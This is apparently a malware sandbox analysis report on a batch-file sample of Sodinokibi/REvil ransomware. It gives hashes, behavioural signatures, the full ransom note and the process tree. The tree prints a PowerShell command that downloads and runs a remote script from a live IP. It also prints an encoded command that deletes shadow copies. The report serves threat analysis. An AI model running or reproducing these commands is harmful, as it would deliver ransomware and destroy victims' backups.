Overview

overview

10

Static

static

a4aca9057c...79.bat

windows7_x64

10

a4aca9057c...79.bat

windows10_x64

10

Analysis

  • max time kernel
    136s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    10-06-2020 04:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a4aca9057cc10618a79ca8151afec479.bat

  • Size

    217B

  • MD5

    e1599c1a16de36f62fc0cc3af1ac017f

  • SHA1

    471367e29f86a7207c149cc46017217291006678

  • SHA256

    9bf30b808e78d5a9b262780e6b3c1479f5886a5026f781e38b057fa90d17ad43

  • SHA512

    e3cfa4040bd5cfcc5e80a141c88d7e2bfe44cccaf83bab2fac65b432c52d66aad6eaf23b607cc78970710d17eef2559adbe1b42ee482bb04e73536ddd214993e

Score
10/10
ransomwareevasionspywaretrojansodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/a4aca9057cc10618a79ca8151afec479

Extracted

Path

C:\hps44xbt0-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome Drive America Holdings! Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension hps44xbt0. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9AA878A028CEE444 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/9AA878A028CEE444 3) If you still have problems accessing the site, you can write to us at: [email protected], indicating the external IP address, country, key FXH+FrdNZSM6zrLpOMdpu8USBE9DvCUFQiuAYKf194G9HPiDuPFHt1UpXwLFVuDq 1Em7smPMQQ/srMG4NPvtYgsr/GZHoWs0avuLIICxsxKJ1Pi698fLtW8IzPS8mLme Y0XI76mFZjKZ9Bma0VsorrmPSGn2fY4RH79QaJ2E6hUykIgp+bu0GRHUMMH6azKJ MYugX9u1dvXOKhJRLBdy5BcjQRFoSzCG3ZWT+NC9+Hxs83CmfLqGBGf6S/5163QM OstkMWXdxEQPTu+DB/XE3jDkyNnWDWSno3aK+2TATfgnlcVf6x09gGjX86j/jY4u qNIOifuuA7E0ISVngRmHgQ7Xn9v5aLGNneWSEQEONxF4X5n9DLMEVsm6+OTlSb4O nlvUhuCrfOybPvv/ZvIdkX5X8sp4IlzdDIU8i6dJTPShey1g2B4MP3TCFCVtPMm/ HcnWokeaCj48k8QJxE+ZFZ0WjscHHvtjKwRaeu2P0w0YeqXBNSEBaKLlsHn6XE0k 1ZRJKi+fVeUHVxcCixeRM1riZA88SrBCKnFLgsdudJHwu+S72+BcfBm5WHpQReB2 v2vBTNGZ/KBWfx3KHYVFJ2yKdmdZF6c5Lwg6NloNhZY1r/2L5f2Ewri31igw8sLY IWt9L0+kpPGXRvTlgUuLNl4EvtPCGExOloCdEQvNCtrDyHMgieKiSS8EBPoA2CpD wq7KwsdZeUXwAC88pEzUeV/VuB5bwCAFh8Ae+H/6V5d+c9gB3tvigHP9K9BMbsrG crrwjJ2NrjOakD1JiDgZVarSETp9sv0B0Qqs5t6gMZd23Rp20aXqnwd3i1bVTmzP olcKuNSieLb81a8uIjSeStiREcUkktwo6CN7dfOlXj6l4CBPPRBUKVUVYTkHc2Bv Uirm5qtT2nO6vVOrZ7C5dOeBTl8IbtQ2Kb/g9usc7VlG4SUWzTWtc+UPE4wQ8QlN clNxcjqq0pxC8JE8cfn3dFPyg8bNupuQVwbx6Hu2JcKr9VnPcwhwQBruL0kVAmuT ayRRW0n7XoPCr+05ROf1XP4aUuti+ZTd9WCnHwlwjhnJQrY4ekNypxP5iqc8LFqQ WuKAqCsVt3mHrc028scw0upCzEGvAnSmk1qXI+5S5I+K8QhisqHpb4P+NYylkrJR knbLK6PTv226Wg7KxUtot5m75dSvpxH0S7ht/eblFxmnfvKwim+LhaQpkryHP4uO 0s15Ghf3QMW5r/0jC62fUFL7kBxlFsX4jYTQudRmDou1km4ndlSSGnZnZFWn36FC thE5tJdrqfGUm+GGehw08Wx4nfyKhMN6q6PbGWA8VIKojszQfwI= and extension hps44xbt0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: FXH+FrdNZSM6zrLpOMdpu8USBE9DvCUFQiuAYKf194G9HPiDuPFHt1UpXwLFVuDq 1Em7smPMQQ/srMG4NPvtYgsr/GZHoWs0avuLIICxsxKJ1Pi698fLtW8IzPS8mLme Y0XI76mFZjKZ9Bma0VsorrmPSGn2fY4RH79QaJ2E6hUykIgp+bu0GRHUMMH6azKJ MYugX9u1dvXOKhJRLBdy5BcjQRFoSzCG3ZWT+NC9+Hxs83CmfLqGBGf6S/5163QM OstkMWXdxEQPTu+DB/XE3jDkyNnWDWSno3aK+2TATfgnlcVf6x09gGjX86j/jY4u qNIOifuuA7E0ISVngRmHgQ7Xn9v5aLGNneWSEQEONxF4X5n9DLMEVsm6+OTlSb4O nlvUhuCrfOybPvv/ZvIdkX5X8sp4IlzdDIU8i6dJTPShey1g2B4MP3TCFCVtPMm/ HcnWokeaCj48k8QJxE+ZFZ0WjscHHvtjKwRaeu2P0w0YeqXBNSEBaKLlsHn6XE0k 1ZRJKi+fVeUHVxcCixeRM1riZA88SrBCKnFLgsdudJHwu+S72+BcfBm5WHpQReB2 v2vBTNGZ/KBWfx3KHYVFJ2yKdmdZF6c5Lwg6NloNhZY1r/2L5f2Ewri31igw8sLY IWt9L0+kpPGXRvTlgUuLNl4EvtPCGExOloCdEQvNCtrDyHMgieKiSS8EBPoA2CpD wq7KwsdZeUXwAC88pEzUeV/VuB5bwCAFh8Ae+H/6V5d+c9gB3tvigHP9K9BMbsrG crrwjJ2NrjOakD1JiDgZVarSETp9sv0B0Qqs5t6gMZd23Rp20aXqnwd3i1bVTmzP olcKuNSieLb81a8uIjSeStiREcUkktwo6CN7dfOlXj6l4CBPPRBUKVUVYTkHc2Bv Uirm5qtT2nO6vVOrZ7C5dOeBTl8IbtQ2Kb/g9usc7VlG4SUWzTWtc+UPE4wQ8QlN clNxcjqq0pxC8JE8cfn3dFPyg8bNupuQVwbx6Hu2JcKr9VnPcwhwQBruL0kVAmuT ayRRW0n7XoPCr+05ROf1XP4aUuti+ZTd9WCnHwlwjhnJQrY4ekNypxP5iqc8LFqQ WuKAqCsVt3mHrc028scw0upCzEGvAnSmk1qXI+5S5I+K8QhisqHpb4P+NYylkrJR knbLK6PTv226Wg7KxUtot5m75dSvpxH0S7ht/eblFxmnfvKwim+LhaQpkryHP4uO 0s15Ghf3QMW5r/0jC62fUFL7kBxlFsX4jYTQudRmDou1km4ndlSSGnZnZFWn36FC thE5tJdrqfGUm+GGehw08Wx4nfyKhMN6q6PbGWA8VIKojszQfwI= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! !!! !!! ATTENTION !!! !!! We want to warn you that in case of refusal to pay, we will post your confidential files that we have downloaded for general access or will sell part of them in the shadow market.
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9AA878A028CEE444

http://decryptor.cc/9AA878A028CEE444

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 175 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\a4aca9057cc10618a79ca8151afec479.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a4aca9057cc10618a79ca8151afec479');Invoke-HVGROAEJEA;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Drops file in System32 directory
      PID:1480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1832
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1604

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit